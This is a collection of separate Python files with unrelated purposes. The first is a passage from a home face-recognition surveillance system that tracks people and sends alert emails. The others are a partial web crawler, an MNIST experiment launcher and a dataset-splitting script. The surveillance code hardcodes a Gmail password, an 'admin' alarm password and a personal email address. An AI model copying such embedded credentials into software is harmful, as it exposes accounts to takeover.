faceimg = ImageUtils.crop(personimg, face_bb, dlibRect = True)
if len(camera.faceDetector.detect_cascadeface_accurate(faceimg)) == 0:
continue
logger.info('/// Processing Detected faces ///')
predictions, alignedFace = self.recogniser.make_prediction(personimg,face_bb)
with camera.peopleDictLock:
if camera.people.has_key(predictions['name']):
if camera.people[predictions['name']].confidence < predictions['confidence']:
camera.people[predictions['name']].confidence = predictions['confidence']
camera.people[predictions['name']].set_thumbnail(alignedFace)
camera.people[predictions['name']].add_to_thumbnails(alignedFace)
camera.people[predictions['name']].set_time()
else:
if predictions['confidence'] > self.confidenceThreshold:
camera.people[predictions['name']] = Person(predictions['rep'],predictions['confidence'], alignedFace, predictions['name'])
else:
camera.people[predictions['name']] = Person(predictions['rep'],predictions['confidence'], alignedFace, "unknown")
############################################################################################################################################################################
#<#####################################> MOTION DETECTION OBJECT SEGMENTAION FOLLOWED BY FACE DETECTION, RECOGNITION AND TRACKING <#####################################>
#############################################################################################################################################################################
elif camera.cameraFunction == "detect_recognise_track":
# This approach incorporates background subtraction to perform person tracking
# and is the most efficient of all the processing functions above. When
# a face is detected in a region, a Tracker object is generated and updated
# every frame by comparing the last known region of the person to new regions
# produced by the motionDetector object. On every update of the tracker a detected
# face is compared to the face of the person being tracked to ensure the tracker
# is still tracking the correct person. This is achieved by comparing the prediction
# and the l2 distance between their embeddings (128 measurements that represent the face).
# If a tracker does not overlap with any of the regions produced by the motionDetector object
# for some time the Tracker is deleted.
training_blocker = self.trainingEvent.wait() # Wait if classifier is being trained
logger.debug('//// detect_recognise_track 1 ////')
peopleFound = False
camera.motion, peopleRects = camera.motionDetector.detect_movement(frame, get_rects = True)
logger.debug('//// detect_recognise_track 2 /////')
if camera.motion == False:
camera.processing_frame = frame
logger.debug('///// NO MOTION DETECTED /////')
continue
if self.drawing == True:
camera.processing_frame = ImageUtils.draw_boxes(frame, peopleRects, False)
logger.debug('//// MOTION DETECTED //////')
for x, y, w, h in peopleRects:
peopleFound = True
person_bb = dlib.rectangle(long(x), long(y), long(x+w), long(y+h))
personimg = ImageUtils.crop(frame, person_bb, dlibRect = True) # Crop regions of interest
personimg = cv2.flip(personimg, 1)
tracked = False
# Iterate through each tracker and compare its current position
for i in xrange(len(camera.trackers) - 1, -1, -1):
if camera.trackers[i].overlap(person_bb):
logger.debug("=> Updating Tracker <=")
camera.trackers[i].update_tracker(person_bb)
# personimg = cv2.flip(personimg, 1)
camera.faceBoxes = camera.faceDetector.detect_faces(personimg,camera.dlibDetection)
logger.debug('////// FACES DETECTED: '+ str(len(camera.faceBoxes)) +' /////')
if len(camera.faceBoxes) > 0:
logger.info("Found " + str(len(camera.faceBoxes)) + " faces.")
for face_bb in camera.faceBoxes:
if camera.dlibDetection == False:
x, y, w, h = face_bb
face_bb = dlib.rectangle(long(x), long(y), long(x+w), long(y+h))
faceimg = ImageUtils.crop(personimg, face_bb, dlibRect = True)
if len(camera.faceDetector.detect_cascadeface_accurate(faceimg)) == 0:
continue
predictions, alignedFace = self.recogniser.make_prediction(personimg,face_bb)
if predictions['confidence'] > self.confidenceThreshold:
predictedName = predictions['name']
else:
predictedName = "unknown"
# If only one face is detected
if len(camera.faceBoxes) == 1:
# If not the same person, check whether the tracked person is unknown and update or change the tracker accordingly.
# The squared l2 distance lies between 0 and 4; OpenFace found that 0.99 was the average cutoff between same and different faces,
# with the same face having a distance of less than 0.99
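# A minimal sketch of the check below (assuming reps are 128-d numpy arrays):
#   diff = tracked_rep - new_rep
#   is_same_person = diff.dot(diff) < 0.99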
if self.recogniser.getSquaredl2Distance(camera.trackers[i].person.rep ,predictions['rep']) > 0.99 and (camera.trackers[i].person.identity != predictedName):
alreadyBeenDetected = False
with camera.peopleDictLock:
for ID, person in camera.people.iteritems(): # iterate through all detected people in camera
# if the person has already been detected continue to track that person - use same person ID
if person.identity == predictedName or self.recogniser.getSquaredl2Distance(person.rep ,predictions['rep']) < 0.8:
person = Person(predictions['rep'],predictions['confidence'], alignedFace, predictedName)
logger.info( "====> New Tracker for " +person.identity + " <===")
# Remove current tracker and create new one with the ID of the original person
del camera.trackers[i]
camera.trackers.append(Tracker(frame, person_bb, person,ID))
alreadyBeenDetected = True
break
if not alreadyBeenDetected:
num = random.randrange(1, 1000, 1)
strID = "person" + datetime.now().strftime("%Y%m%d%H%M%S") + str(num) # Create a new person ID
# Is the new person detected with a low confidence? If yes, classify them as unknown
if predictions['confidence'] > self.confidenceThreshold:
person = Person(predictions['rep'],predictions['confidence'], alignedFace, predictions['name'])
else:
person = Person(predictions['rep'],predictions['confidence'], alignedFace, "unknown")
#add person to detected people
with camera.peopleDictLock:
camera.people[strID] = person
logger.info( "=====> New Tracker for new person <====")
del camera.trackers[i]
camera.trackers.append(Tracker(frame, person_bb, person,strID))
# If it is the same person, update the confidence if it is higher and change the prediction from unknown to the identified person.
# If the newly detected face has a lower confidence and can be classified as unknown while the person being tracked isn't unknown, change the tracker
else:
logger.info( "====> update person name and confidence <==")
if camera.trackers[i].person.confidence < predictions['confidence']:
camera.trackers[i].person.confidence = predictions['confidence']
if camera.trackers[i].person.confidence > self.confidenceThreshold:
camera.trackers[i].person.identity = predictions['name']
# If more than one face is detected in the region compare faces to the people being tracked and update tracker accordingly
else:
logger.info( "==> More Than One Face Detected <==")
# if tracker is already tracking the identified face make an update
if self.recogniser.getSquaredl2Distance(camera.trackers[i].person.rep ,predictions['rep']) < 0.99 and camera.trackers[i].person.identity == predictions['name']:
if camera.trackers[i].person.confidence < predictions['confidence']:
camera.trackers[i].person.confidence = predictions['confidence']
if camera.trackers[i].person.confidence > self.confidenceThreshold:
camera.trackers[i].person.identity = predictions['name']
else:
# if tracker isn't tracking this face check the next tracker
break
camera.trackers[i].person.set_thumbnail(alignedFace)
camera.trackers[i].person.add_to_thumbnails(alignedFace)
camera.trackers[i].person.set_rep(predictions['rep'])
camera.trackers[i].person.set_time()
camera.trackers[i].reset_face_pinger()
with camera.peopleDictLock:
camera.people[camera.trackers[i].id] = camera.trackers[i].person
camera.trackers[i].reset_pinger()
tracked = True
break
# If the region is not being tracked
if not tracked:
# Look for faces in the cropped image of the region
camera.faceBoxes = camera.faceDetector.detect_faces(personimg,camera.dlibDetection)
for face_bb in camera.faceBoxes:
if camera.dlibDetection == False:
x, y, w, h = face_bb
face_bb = dlib.rectangle(long(x), long(y), long(x+w), long(y+h))
faceimg = ImageUtils.crop(personimg, face_bb, dlibRect = True)
if len(camera.faceDetector.detect_cascadeface_accurate(faceimg)) == 0:
continue
predictions, alignedFace = self.recogniser.make_prediction(personimg,face_bb)
alreadyBeenDetected = False
with camera.peopleDictLock:
for ID, person in camera.people.iteritems(): # iterate through all detected people in camera, to see if the person has already been detected
if person.identity == predictions['name'] or self.recogniser.getSquaredl2Distance(person.rep ,predictions['rep']) < 0.8:
if predictions['confidence'] > self.confidenceThreshold and person.confidence > self.confidenceThreshold:
person = Person(predictions['rep'],predictions['confidence'], alignedFace, predictions['name'])
else:
person = Person(predictions['rep'],predictions['confidence'], alignedFace, "unknown")
logger.info( "==> New Tracker for " + person.identity + " <====")
camera.trackers.append(Tracker(frame, person_bb, person,ID))
alreadyBeenDetected = True
break
if not alreadyBeenDetected:
num = random.randrange(1, 1000, 1) # Create new person ID if they have not been detected
strID = "person" + datetime.now().strftime("%Y%m%d%H%M%S") + str(num)
if predictions['confidence'] > self.confidenceThreshold:
person = Person(predictions['rep'],predictions['confidence'], alignedFace, predictions['name'])
else:
person = Person(predictions['rep'],predictions['confidence'], alignedFace, "unknown")
#add person to detected people
with camera.peopleDictLock:
camera.people[strID] = person
logger.info( "====> New Tracker for new person <=")
camera.trackers.append(Tracker(frame, person_bb, person,strID))
for i in xrange(len(camera.trackers) - 1, -1, -1): # starts with the most recently initiated tracker
if self.drawing == True:
bl = (camera.trackers[i].bb.left(), camera.trackers[i].bb.bottom()) # (x, y)
tr = (camera.trackers[i].bb.right(), camera.trackers[i].bb.top()) # (x+w,y+h)
cv2.rectangle(frame, bl, tr, color=(0, 255, 255), thickness=2)
cv2.putText(frame, camera.trackers[i].person.identity + " " + str(camera.trackers[i].person.confidence)+ "%", (camera.trackers[i].bb.left(), camera.trackers[i].bb.top() - 10),
cv2.FONT_HERSHEY_SIMPLEX, fontScale=0.3,
color=(0, 255, 255), thickness=1)
camera.processing_frame = frame
# Used to check if tracker hasn't been updated
camera.trackers[i].ping()
camera.trackers[i].faceping()
# If the tracker hasn't been updated for more than 10 pings delete it
if camera.trackers[i].pings > 10:
del camera.trackers[i]
continue
elif camera.cameraFunction == "testing":
# Used for testing purposes
training_blocker = self.trainingEvent.wait()
# tempframe = frame
frame = cv2.flip(frame, 1)
camera.faceBoxes = camera.faceDetector.detect_faces(frame,camera.dlibDetection)
if self.drawing == True:
frame = ImageUtils.draw_boxes(frame, camera.faceBoxes, camera.dlibDetection)
camera.processing_frame = frame
logger.debug('//// FACES DETECTED: '+ str(len(camera.faceBoxes)) +' //')
for face_bb in camera.faceBoxes:
result = ""
# used to reduce false positives from opencv haar cascade detector
if camera.dlibDetection == False:
x, y, w, h = face_bb
face_bb = dlib.rectangle(long(x), long(y), long(x+w), long(y+h))
faceimg = ImageUtils.crop(frame, face_bb, dlibRect = True)
if len(camera.faceDetector.detect_cascadeface_accurate(faceimg)) == 0:
continue
with self.testingResultsLock:
self.detetectionsCount += 1
predictions, alignedFace = self.recogniser.make_prediction(frame,face_bb)
cv2.imwrite('testing/results/unconstrained/alignedDetections/60/'+ str( self.detetectionsCount) +'.png',alignedFace)
if predictions['name'] == 'brandon-joffe':
self.trueDetections += 1
self.confidence_sum += predictions['confidence']
result = str( self.detetectionsCount) + ', ' + predictions['name'] + ', ' + str(predictions['confidence'])+ ', ' + str(self.trueDetections) + ', ' + str(self.confidence_sum)
ImageUtils.writeToFile('testing/results/unconstrained/accuracy/results60.txt',result)
elif camera.cameraFunction == "face_capture":
# This will be used to capture faces for training in the surveillance environment
# not fully implemented - was mainly used for face capture during testing
training_blocker = self.trainingEvent.wait()
# tempframe = frame
frame = cv2.flip(frame, 1)
camera.faceBoxes = camera.faceDetector.detect_faces(frame,camera.dlibDetection)
logger.debug('// FACES DETECTED: '+ str(len(camera.faceBoxes)) +' ///')
for face_bb in camera.faceBoxes:
result = ""
# used to reduce false positives from opencv haar cascade detector
if camera.dlibDetection == False:
x, y, w, h = face_bb
face_bb = dlib.rectangle(long(x), long(y), long(x+w), long(y+h))
faceimg = ImageUtils.crop(frame, face_bb, dlibRect = True)
if len(camera.faceDetector.detect_cascadeface_accurate(faceimg)) == 0:
continue
with self.testingResultsLock:
self.detetectionsCount += 1
predictions, alignedFace = self.recogniser.make_prediction(frame,face_bb)
# cv2.imwrite('testing/alignedFacesForTraining/surelda/surelda'+ str(self.detetectionsCount) +'.png',alignedFace)
cv2.imwrite('testing/alignedFacesForTesting/tracy/tracy-'+ str(self.detetectionsCount) +'.png',alignedFace)
if self.drawing == True:
frame = ImageUtils.draw_boxes(frame, camera.faceBoxes, camera.dlibDetection)
camera.processing_frame = frame
def alert_engine(self):
"""check alarm state -> check camera -> check event ->
either look for motion or look for detected faces -> take action"""
logger.debug('Alert engine starting')
while True:
with self.alertsLock:
for alert in self.alerts:
logger.debug('checking alert')
if alert.action_taken == False: # If action hasn't been taken for event
if alert.alarmState != 'All': # Check states
if alert.alarmState == self.alarmState:
logger.debug('checking alarm state')
alert.event_occurred = self.check_camera_events(alert)
else:
continue # Alarm not in correct state check next alert
else:
alert.event_occurred = self.check_camera_events(alert)
else:
if (time.time() - alert.eventTime) > 300: # Reinitialise the event 5 min after it occurred
logger.info( "reinitialising alert: " + alert.id)
alert.reinitialise()
continue
time.sleep(2) # Put this thread to sleep - let the websocket update alerts if need be (i.e. delete or add)
def check_camera_events(self,alert):
"""Used to check state of cameras
to determine whether an event has occurred"""
if alert.camera != 'All': # Check cameras
logger.info( "alertTest" + alert.camera)
if alert.event == 'Recognition': #Check events
logger.info( "checkingalertconf "+ str(alert.confidence) + " : " + alert.person)
for person in self.cameras[int(alert.camera)].people.values():
logger.info( "checkingalertconf "+ str(alert.confidence )+ " : " + alert.person + " : " + person.identity)
if alert.person == person.identity: # Has person been detected
if alert.person == "unknown" and (100 - person.confidence) >= alert.confidence:
logger.info( "alertTest2" + alert.camera)
cv2.imwrite("notification/image.png", self.cameras[int(alert.camera)].processing_frame)#
self.take_action(alert)
return True
elif person.confidence >= alert.confidence:
logger.info( "alertTest3" + alert.camera)
cv2.imwrite("notification/image.png", self.cameras[int(alert.camera)].processing_frame)#
self.take_action(alert)
return True
return False # Person has not been detected check next alert
else:
logger.info( "alertTest4" + alert.camera)
if self.cameras[int(alert.camera)].motion == True: # Has motion been detected
logger.info( "alertTest5" + alert.camera)
cv2.imwrite("notification/image.png", self.cameras[int(alert.camera)].processing_frame)#
self.take_action(alert)
return True
else:
return False # Motion was not detected check next alert
else:
if alert.event == 'Recognition': # Check events
with self.camerasLock:
cameras = self.cameras
for camera in cameras: # Look through all cameras
for person in camera.people.values():
if alert.person == person.identity: # Has person been detected
if alert.person == "unknown" and (100 - person.confidence) >= alert.confidence:
cv2.imwrite("notification/image.png", camera.processing_frame)#
self.take_action(alert)
return True
elif person.confidence >= alert.confidence:
cv2.imwrite("notification/image.png", camera.processing_frame)#
self.take_action(alert)
return True
return False # Person has not been detected check next alert
else:
with self.camerasLock:
for camera in self.cameras: # Look through all cameras
if camera.motion == True: # Has motion been detected
cv2.imwrite("notification/image.png", camera.processing_frame)#
self.take_action(alert)
return True
return False # Motion was not detected check next camera
def take_action(self,alert):
"""Sends email alert and/or triggers the alarm"""
logger.info( "Taking action: ==" + alert.actions)
if alert.action_taken == False: # Only take action if the alert hasn't occurred - Alerts reinitialise every 5 min for now
alert.eventTime = time.time()
if alert.actions['email_alert'] == 'true':
logger.info( "email notification being sent")
self.send_email_notification_alert(alert)
if alert.actions['trigger_alarm'] == 'true':
logger.info( "triggering alarm1")
self.trigger_alarm()
logger.info( "alarm1 triggered")
alert.action_taken = True
def send_email_notification_alert(self,alert):
""" Code produced in this tutorial - http://naelshiab.com/tutorial-send-email-python/"""
fromaddr = "home.face.surveillance@gmail.com"
toaddr = alert.emailAddress
msg = MIMEMultipart()
msg['From'] = fromaddr
msg['To'] = toaddr
msg['Subject'] = "HOME SURVEILLANCE"
body = "NOTIFICATION ALERT:" + alert.alertString + ""
msg.attach(MIMEText(body, 'plain'))
filename = "image.png"
attachment = open("notification/image.png", "rb")
part = MIMEBase('application', 'octet-stream')
part.set_payload((attachment).read())
encoders.encode_base64(part)
part.add_header('Content-Disposition', "attachment; filename= %s" % filename)
msg.attach(part)
server = smtplib.SMTP('smtp.gmail.com', 587)
server.starttls()
server.login(fromaddr, "facialrecognition")
text = msg.as_string()
server.sendmail(fromaddr, toaddr, text)
server.quit()
def add_face(self,name,image, upload):
"""Adds face to directory used for training the classifier"""
if upload == False:
path = fileDir + "/aligned-images/"
else:
path = fileDir + "/training-images/"
num = 0
if not os.path.exists(path + name):
try:
logger.info( "Creating New Face Dircectory: " + name)
os.makedirs(path+name)
except OSError as e:
logger.info(e)
return False
pass
else:
num = len([nam for nam in os.listdir(path +name) if os.path.isfile(os.path.join(path+name, nam))])
logger.info( "Writing Image To Directory: " + name)
cv2.imwrite(path+name+"/"+ name + "_"+str(num) + ".png", image)
self.get_face_database_names()
return True
def get_face_database_names(self):
"""Gets all the names that were most recently
used to train the classifier"""
path = fileDir + "/aligned-images/"
self.peopleDB = []
for name in os.listdir(path):
if (name == 'cache.t7' or name == '.DS_Store' or name[0:7] == 'unknown'):
continue
self.peopleDB.append(name)
logger.info("Known faces in our db for: " + name + " ")
self.peopleDB.append('unknown')
def change_alarm_state(self):
"""Sends Raspberry PI a resquest to change the alarm state.
192.168.1.35 is the RPI's static IP address port 5000 is used
to access the flask application."""
r = requests.post('http://192.168.1.35:5000/change_state', data={"password": "admin"})
alarm_states = json.loads(r.text)
logger.info(alarm_states)
if alarm_states['state'] == 1:
self.alarmState = 'Armed'
else:
self.alarmState = 'Disarmed'
self.alarmTriggerd = alarm_states['triggered']
def trigger_alarm(self):
"""Sends Raspberry PI a resquest to change to trigger the alarm.
192.168.1.35 is the RPI's static IP address port 5000 is used
to access the flask application."""
r = requests.post('http://192.168.1.35:5000/trigger', data={"password": "admin"})
alarm_states = json.loads(r.text)
logger.info(alarm_states)
if alarm_states['state'] == 1:
self.alarmState = 'Armed'
else:
self.alarmState = 'Disarmed'
self.alarmTriggerd = alarm_states['triggered']
logger.info(self.alarmTriggerd )
#\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
class Person(object):
"""Person object simply holds all the
person's information for other processes
"""
person_count = 0
def __init__(self,rep,confidence = 0, face = None, name = "unknown"):
if "unknown" not in name: # Used to include unknown-N from Database
self.identity = name
else:
self.identity = "unknown"
self.count = Person.person_count
self.confidence = confidence
self.thumbnails = []
self.face = face
self.rep = rep # Face representation
if face is not None:
ret, jpeg = cv2.imencode('.jpg', face) # Convert to jpg to be viewed by client
self.thumbnail = jpeg.tostring()
self.thumbnails.append(self.thumbnail)
Person.person_count += 1
now = datetime.now() + timedelta(hours=2)
self.time = now.strftime("%A %d %B %Y %I:%M:%S%p")
self.istracked = False
def set_rep(self, rep):
self.rep = rep
def set_identity(self, identity):
self.identity = identity
def set_time(self): # Update time when person was detected
now = datetime.now() + timedelta(hours=2)
self.time = now.strftime("%A %d %B %Y %I:%M:%S%p")
def set_thumbnail(self, face):
self.face = face
ret, jpeg = cv2.imencode('.jpg', face) # Convert to jpg to be viewed by client
self.thumbnail = jpeg.tostring()
def add_to_thumbnails(self, face):
ret, jpeg = cv2.imencode('.jpg', face) # Convert to jpg to be viewed by client
self.thumbnails.append(jpeg.tostring())
class Tracker:
"""Keeps track of person position"""
tracker_count = 0
def __init__(self, img, bb, person, id):
self.id = id
self.person = person
self.bb = bb
self.pings = 0
self.facepings = 0
def reset_pinger(self):
self.pings = 0
def reset_face_pinger(self):
self.facepings = 0
def update_tracker(self,bb):
self.bb = bb
def overlap(self, bb):
p = float(self.bb.intersect(bb).area()) / float(self.bb.area())
return p > 0.2
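# Example: a tracker box of area 100 sharing an intersection of area 25 with
# the new bounding box gives p = 0.25, which counts as an overlap.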
def ping(self):
self.pings += 1
def faceping(self):
self.facepings += 1
class Alert(object):
"""Holds all the alert details and is continually checked by
the alert monitoring thread"""
alert_count = 1
def __init__(self,alarmState,camera, event, person, actions, emailAddress, confidence):
logger.info( "alert_"+str(Alert.alert_count)+ " created")
if event == 'Motion':
self.alertString = "Motion detected in camera " + camera
else:
self.alertString = person + " was recognised in camera " + camera + " with a confidence greater than " + str(confidence)
self.id = "alert_" + str(Alert.alert_count)
self.event_occurred = False
self.action_taken = False
self.camera = camera
self.alarmState = alarmState
self.event = event
self.person = person
self.confidence = confidence
self.actions = actions
if emailAddress == None:
self.emailAddress = "bjjoffe@gmail.com"
else:
self.emailAddress = emailAddress
self.eventTime = 0
Alert.alert_count += 1
def reinitialise(self):
self.event_occurred = False
self.action_taken = False
def set_custom_alertmessage(self,message):
self.alertString = message
|
main.py
|
from html.parser import HTMLParser
from threading import Thread
import re
from urllib import request, robotparser
import URIUnderstand
import basicDownload
class Parse(HTMLParser):
    def __init__(self, url, saveList=None, unsafeList=None, hasParsedList=None):
        # Fresh containers per instance avoid the shared-mutable-default pitfall.
        self.saveList = saveList if saveList is not None else []
        self.unsafeList = unsafeList if unsafeList is not None else []
        self.hasParsedList = hasParsedList if hasParsedList is not None else {}
        self.baseURL = url
        self.url = url
        super(Parse, self).__init__()
        self.getData = basicDownload.download(url)  # assumption: basicDownload exposes a download() helper
    def unsafe(self, url):
        if url not in self.hasParsedList:
            self.unsafeList.append(url)
            self.hasParsedList[url] = True
    def share(self, url):
        if url not in self.hasParsedList:
            self.saveList.append(url)
            self.hasParsedList[url] = True
            return True
        return False
    def create(self, link):
        if self.share(link):
            newThread = Thread(target=threadMethod, args=(link, self.saveList, self.hasParsedList))
            newThread.daemon = True
            newThread.start()
    def handle_starttag(self, tag, attributes):
        # HTMLParser delivers attributes as a list of (name, value) tuples.
        attrs = dict(attributes)
        if tag == "a" or tag == "link":
            self.create(attrs.get("href"))
        elif tag == "script" or tag == "img" or tag == "audio" or tag == "embed":
            self.share(attrs.get("src"))
        elif tag == "iframe" or tag == "source":
            self.create(attrs.get("src"))
        elif tag == "object":
            self.create(attrs.get("data"))  # assumption: "data" carries the URL for <object> tags
        elif tag == "form":
            self.unsafe(attrs.get("action"))
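# Illustrative usage sketch (hypothetical entry point):
#   parser = Parse('http://example.com')
#   parser.feed(parser.getData)
#   print(parser.saveList)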
def threadMethod(url, saveList, hasParsedList):
v = URIUnderstand.UnderstandURL(url) # assumption: UnderstandURL comes from the imported URIUnderstand module
if v.isOK():
p = robotparser.RobotFileParser()
p.set_url(v.catDomain + "/robots.txt")
p.read()
if p.can_fetch(USER_AGENT, url): # USER_AGENT is assumed to be defined in the (truncated) remainder of this module
|
rw_mnist.py
|
from core.run import run
from core.task_schedule import wait_schedule, Task, available_devices
from multiprocessing import Process
import datetime
import argparse
if __name__ == "__main__":
now = datetime.datetime.now().strftime("%Y-%m-%d-%H-%M-%S")
tag = 'ablo_K'
if tag == 'ablo_K':
tasks = []
for seed in [0, 33, 777, 1341, 25731]:
for K in [64, 128, 256, 512]:
args = argparse.Namespace(
T=5000, K=K, seed=seed, ho_algo='ablo', dataset='corrupted_mnist', width=28, x_dim=784,
loss='ReweightingMLP', theta_mlp_shape=[784, 256, 10],
m_tr=2000, m_val=200, m_te=1000, m_mval=200, batch_size=100, lr_h=10, lr_l=0.3, wd_h=0., wd_l=0.,
mm_h=0.)
args.workspace_root = "workspace/runs/rw_mnist/ablo_K_{}/seed_{}_K_{}".format(
now, seed, K)
p = Process(target=run, args=(args,))
tasks.append(Task(p, 1))
wait_schedule(tasks, devices=available_devices() * 3)
elif tag == 'wdh':
tasks = []
for seed in [0, 33, 777, 1341, 25731]:
for K in [512]:
for wd_h in [3e-6, 1e-5, 3e-5, 1e-4, 3e-4]:
args = argparse.Namespace(
T=5000, K=K, seed=seed, ho_algo='ablo', dataset='corrupted_mnist', width=28, x_dim=784,
loss='ReweightingMLP', theta_mlp_shape=[784, 256, 10],
m_tr=2000, m_val=200, m_te=1000, m_mval=200, batch_size=100, lr_h=10, lr_l=0.3, wd_h=wd_h, wd_l=0.,
mm_h=0.)
args.workspace_root = "workspace/runs/rw_mnist/wdh_{}/seed_{}_K_{}_wdh_{}".format(
now, seed, K, wd_h)
p = Process(target=run, args=(args,))
tasks.append(Task(p, 1))
wait_schedule(tasks, devices=available_devices() * 3)
elif tag == 'wdl':
tasks = []
for seed in [0, 33, 777, 1341, 25731]:
for K in [512]:
for wd_l in [1e-3, 3e-3, 1e-2, 3e-2, 1e-1]:
args = argparse.Namespace(
T=5000, K=K, seed=seed, ho_algo='ablo', dataset='corrupted_mnist', width=28, x_dim=784,
loss='ReweightingMLP', theta_mlp_shape=[784, 256, 10],
m_tr=2000, m_val=200, m_te=1000, m_mval=200, batch_size=100, lr_h=10, lr_l=0.3, wd_h=0., wd_l=wd_l,
mm_h=0.)
args.workspace_root = "workspace/runs/rw_mnist/wdl_{}/seed_{}_K_{}_wdl_{}".format(
now, seed, K, wd_l)
p = Process(target=run, args=(args,))
tasks.append(Task(p, 1))
wait_schedule(tasks, devices=available_devices() * 3)
elif tag == 'wdboth':
tasks = []
for seed in [0, 33, 777, 1341, 25731]:
for K in [512]:
for wd_l, wd_h in [(1e-3, 3e-6), (1e-3, 1e-5),
(1e-3, 3e-5), (1e-3, 1e-4)]:
args = argparse.Namespace(
T=5000, K=K, seed=seed, ho_algo='ablo', dataset='corrupted_mnist', width=28, x_dim=784,
loss='ReweightingMLP', theta_mlp_shape=[784, 256, 10],
m_tr=2000, m_val=200, m_te=1000, m_mval=200, batch_size=100, lr_h=10, lr_l=0.3, wd_h=wd_h, wd_l=wd_l,
mm_h=0.)
args.workspace_root = "workspace/runs/rw_mnist/wdboth_{}/seed_{}_K_{}_wdl_{}_wdh_{}".format(now, seed, K, wd_l, wd_h)
p = Process(target=run, args=(args,))
tasks.append(Task(p, 1))
wait_schedule(tasks, devices=available_devices() * 3)
elif tag == 'rs_K':
tasks = []
for seed in [0, 33, 777, 1341, 25731]:
for K in [64, 128, 256, 512]:
args = argparse.Namespace(
T=5000, K=K, seed=seed, ho_algo='random_search', dataset='corrupted_mnist', width=28, x_dim=784,
loss='ReweightingMLP', theta_mlp_shape=[784, 256, 10],
m_tr=2000, m_val=200, m_te=1000, m_mval=200, batch_size=100, lr_l=0.3, wd_l=0.)
args.workspace_root = "workspace/runs/rw_mnist/rs_K_{}/seed_{}_K_{}".format(
now, seed, K)
p = Process(target=run, args=(args,))
tasks.append(Task(p, 1))
wait_schedule(tasks, devices=available_devices() * 3)
|
dataset_formator.py
|
#!/bin/python
# Begin license text.
#
# Copyright 2021 Ondřej Zobal
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR
# OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE,
# ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
# OTHER DEALINGS IN THE SOFTWARE.
#
# End license text.
import os
import sys
import pathlib
import time
import threading
from shutil import copyfile
# ADJUSTABLE VARIABLES.
# Change the following group of variables to alter the behavior of the script.
# The categories into which the dataset will be divided.
categories = [
'training',
'validation',
'finetuning',
]
# Ratio to split values between categories.
ratio = [
0.6,
0.2,
0.2,
]
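# Example: with 1000 samples in a class, the ratios above yield
# 600 training, 200 validation and 200 finetuning files.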
# When true, 'class_duplicate_amount' or 'class_exclude_amount' will be replaced
# with an automatically calculated value if set to 0.
calculate_threshold_automatically = False
# Zero means don't duplicate, if 'calculate_threshold_automatically' is False.
class_duplicate_amount = 0
# Zero means don"t exclude, if 'calculate_threshold_automatically' is False.
class_exclude_amount = 0
# Path to the source directory.
source = None
# Path to the directory where the formatted dataset will be created.
destination = None
# If true will use symlink, otherwise copying will be employed.
do_symlink = True
# NONADJUSTABLE VARIABLES.
# These variables will be set by the program.
# Will be filled with the class names.
source_dirs = []
# A table, will contain lists with files.
source_files = []
# List of indexes of classes that have to be overfitted.
sub_avg = []
# List of indexes of classes that have to be excluded.
sub_acc = []
# List of the amounts of files that will need to be copied for each class.
amounts = []
# Progress of creating classes.
progress_class = 0
# Progress of creating files.
progress_file = 0
# Boolean indicating the thread should exit.
thread_stop = False
# May activate some debug features.
DEBUG = False
def banner():
print('''\
____
(| \
| | __, _|_ __, , _ _|_
_| |/ | | / | / \_|/ |
(/\___/ \_/|_/|_/\_/|_/ \/ |__/|_/
______ by Ondřej Zobal
(_) |
_|_ __ ,_ _ _ _ __, _|_ __ ,_
/ | |/ \_/ | / |/ |/ | / | | / \_/ |
(_/ \__/ |_/ | | |_/\_/|_/|_/\__/ |_/
''')
# Prints a log message prefixed with a level symbol.
def log(message, level='info', start=' ', end='\n', hide_box=False):
symbol = {
'info': '*',
'warning': 'W',
'error': '!',
}
box = f'[{symbol.get(level)}] ' if not hide_box else ''
nl = '\n'
print(
f'{nl if level == "error" else ""}{start}{box}{message}',
end=end)
# Exits the program prematurely and prints an error message.
def stop(msg='AN ISSUE'):
global thread_stop
log(f'THE PROGRAM IS EXITING DUE TO: {msg}', 'error')
thread_stop = True
exit()
# Print a help text.
def arg_help(next_arg):
log('''You can use these flags:
-h\tDisplays this message.
-e\tMinimum amount of samples before the dataset will be excluded.
-D\tMinimum amount of samples before the dataset will be duplicated.
-C\tFlips calculate_threshold_automatically. If true, exclusion and
duplicating amounts will be calculated if they have been set to 0.
-r\tThe ratios between the categories separated by commas. (Ex. 0.6,0.4)
-c\tThe names of categories separated by commas. (Ex. train,validation)
-s\tThe directory of the source.
-d\tThe directory of the destination.
-S\tFlips do_symlink variable. If true, links will be used instead of copying.
''')
exit()
return False
# Sets the ratio
def arg_ratio(next_arg):
global ratio
string_list = next_arg.split(',')
ratio = []
for x in string_list:
ratio.append(float(x))
# If the sum of all the numbers is greater than one
if sum(ratio) > 1:
stop('Sum of ratio is greater than 1!')
return True
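# Example: '-r 0.6,0.2,0.2' yields ratio == [0.6, 0.2, 0.2]. Passing one value
# fewer than there are categories is also valid; the missing share is filled
# in later by check_validity_of_configuration().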
# Sets the source directory
def arg_source(next_arg):
global source
source = next_arg
return True
# Sets the destination directory
def arg_destination(next_arg):
global destination
destination = pathlib.Path(next_arg)
return True
# Flips value in 'do_symlink'.
def arg_symlink(next_arg):
global do_symlink
do_symlink = not do_symlink
return False
# Sets the duplicate threshold.
def arg_duplicate_amount(next_arg):
global class_duplicate_amount
try:
class_duplicate_amount = int(next_arg)
except:
stop('Invalid command line argument passed for duplicating amount.')
return True
# Sets the exclusion threshold.
def arg_exclude_amount(next_arg):
global class_exclude_amount
try:
class_exclude_amount = int(next_arg)
except:
stop('Invalid command line argument passed for exclusion amount.')
return True
